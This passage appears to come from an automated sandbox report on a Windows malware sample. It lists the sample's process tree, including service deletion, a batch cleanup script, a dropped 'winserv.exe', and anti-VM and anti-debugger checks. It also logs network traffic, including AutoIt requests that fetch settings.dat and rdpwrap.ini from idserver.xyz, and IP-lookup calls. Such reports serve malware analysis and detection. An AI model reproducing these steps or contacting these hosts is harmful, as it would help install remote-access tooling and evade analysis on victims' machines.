                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c sc delete crmsvc
                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1248
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      sc delete crmsvc
                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4116
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Programdata\Install\Del3.bat
                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1588
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        timeout 5
                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:328
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4420
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3124
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2628
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1696
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\Windows Tasks Service\winserv.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1928
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\unsecapp.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\unsecapp.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2612

                                                                                                                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      140.32.126.40.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      140.32.126.40.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      arc.msn.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      arc.msn.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      arc.msn.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                                                      arc.trafficmanager.net
                                                                                                                                                                                                                                                                                                                                                                                                                                      arc.trafficmanager.net
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                                                      iris-de-prod-azsc-v2-weu.westeurope.cloudapp.azure.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      iris-de-prod-azsc-v2-weu.westeurope.cloudapp.azure.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      20.103.156.88
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      95.221.229.192.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      95.221.229.192.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      88.156.103.20.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      88.156.103.20.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      idserver.xyz
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      idserver.xyz
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      idserver.xyz
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      45.95.203.83
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      iplogger.co
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      iplogger.co
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      iplogger.co
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      104.21.82.93
                                                                                                                                                                                                                                                                                                                                                                                                                                      iplogger.co
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      172.67.167.249
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      iplogger.co
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      iplogger.co
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-ru
                                                                                                                                                                                                                                                                                                                                                                                                                                      GET
                                                                                                                                                                                                                                                                                                                                                                                                                                      http://idserver.xyz/STATUS.html
                                                                                                                                                                                                                                                                                                                                                                                                                                      smss.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      45.95.203.83:80
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      GET /STATUS.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: AutoIt
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: idserver.xyz
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.10.3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 26 Aug 2024 17:34:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 08 Sep 2022 15:11:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      ETag: "631a0606-6"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-ru
                                                                                                                                                                                                                                                                                                                                                                                                                                      GET
                                                                                                                                                                                                                                                                                                                                                                                                                                      http://idserver.xyz/settings.dat
                                                                                                                                                                                                                                                                                                                                                                                                                                      smss.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      45.95.203.83:80
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      GET /settings.dat HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: AutoIt
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: idserver.xyz
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.10.3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 26 Aug 2024 17:34:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 2914
                                                                                                                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 02 Jan 2024 13:06:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      ETag: "65940a70-b62"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-ru
                                                                                                                                                                                                                                                                                                                                                                                                                                      GET
                                                                                                                                                                                                                                                                                                                                                                                                                                      http://idserver.xyz/STATUS.html
                                                                                                                                                                                                                                                                                                                                                                                                                                      smss.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      45.95.203.83:80
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      GET /STATUS.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: AutoIt
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: idserver.xyz
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.10.3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 26 Aug 2024 17:34:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 08 Sep 2022 15:11:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      ETag: "631a0606-6"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-ru
                                                                                                                                                                                                                                                                                                                                                                                                                                      GET
                                                                                                                                                                                                                                                                                                                                                                                                                                      http://idserver.xyz/rdpwrap.ini
                                                                                                                                                                                                                                                                                                                                                                                                                                      smss.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      45.95.203.83:80
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      GET /rdpwrap.ini HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: AutoIt
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: idserver.xyz
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.10.3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 26 Aug 2024 17:34:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 440881
                                                                                                                                                                                                                                                                                                                                                                                                                                      Last-Modified: Sat, 17 Aug 2024 08:14:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      ETag: "66c05be4-6ba31"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-fr
                                                                                                                                                                                                                                                                                                                                                                                                                                      GET
                                                                                                                                                                                                                                                                                                                                                                                                                                      http://c.pki.goog/r/gsr1.crl
                                                                                                                                                                                                                                                                                                                                                                                                                                      IP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      216.58.214.163:80
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      GET /r/gsr1.crl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: c.pki.goog
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 1739
                                                                                                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: sffe
                                                                                                                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 26 Aug 2024 17:20:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Expires: Mon, 26 Aug 2024 18:10:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=3000
                                                                                                                                                                                                                                                                                                                                                                                                                                      Age: 857
                                                                                                                                                                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 08 Jul 2024 07:38:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: application/pkix-crl
                                                                                                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-fr
                                                                                                                                                                                                                                                                                                                                                                                                                                      GET
                                                                                                                                                                                                                                                                                                                                                                                                                                      http://c.pki.goog/r/r4.crl
                                                                                                                                                                                                                                                                                                                                                                                                                                      IP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      216.58.214.163:80
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      GET /r/r4.crl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: c.pki.goog
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 436
                                                                                                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: sffe
                                                                                                                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 26 Aug 2024 17:20:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Expires: Mon, 26 Aug 2024 18:10:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=3000
                                                                                                                                                                                                                                                                                                                                                                                                                                      Age: 855
                                                                                                                                                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: application/pkix-crl
                                                                                                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      163.214.58.216.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      163.214.58.216.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      163.214.58.216.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                                                      mad01s26-in-f1631e100net
                                                                                                                                                                                                                                                                                                                                                                                                                                      163.214.58.216.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                                                      mad01s26-in-f3�J
                                                                                                                                                                                                                                                                                                                                                                                                                                      163.214.58.216.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                                                      par10s42-in-f3�J
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      ip-api.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      ip-api.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      ip-api.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      208.95.112.1
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      251.200.0.194.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      251.200.0.194.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      251.200.0.194.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                                                      freemailfreehostcomua
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      arc.msn.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      arc.msn.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      arc.msn.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                                                      arc.trafficmanager.net
                                                                                                                                                                                                                                                                                                                                                                                                                                      arc.trafficmanager.net
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                                                      iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      20.223.35.26
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      arc.msn.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      arc.msn.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      96.147.199.91.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      96.147.199.91.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      96.147.199.91.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                                                      s796447srvapecom
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      ctldl.windowsupdate.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                                                                                                                                                                                                                                      ctldl.windowsupdate.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                                                                                                                                                                                                                                      ctldl.windowsupdate.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                                                      ctldl.windowsupdate.com.delivery.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      ctldl.windowsupdate.com.delivery.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                                                      wu-b-net.trafficmanager.net
                                                                                                                                                                                                                                                                                                                                                                                                                                      wu-b-net.trafficmanager.net
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                                                      download.windowsupdate.com.edgesuite.net
                                                                                                                                                                                                                                                                                                                                                                                                                                      download.windowsupdate.com.edgesuite.net
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                                                      a767.dspw65.akamai.net
                                                                                                                                                                                                                                                                                                                                                                                                                                      a767.dspw65.akamai.net
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      92.123.143.240
                                                                                                                                                                                                                                                                                                                                                                                                                                      a767.dspw65.akamai.net
                                                                                                                                                                                                                                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                                                                                                                                                                                                                                      92.123.140.25
                                                                                                                                                                                                                                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                                                                                                                                                                                                                                      240.143.123.92.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Request
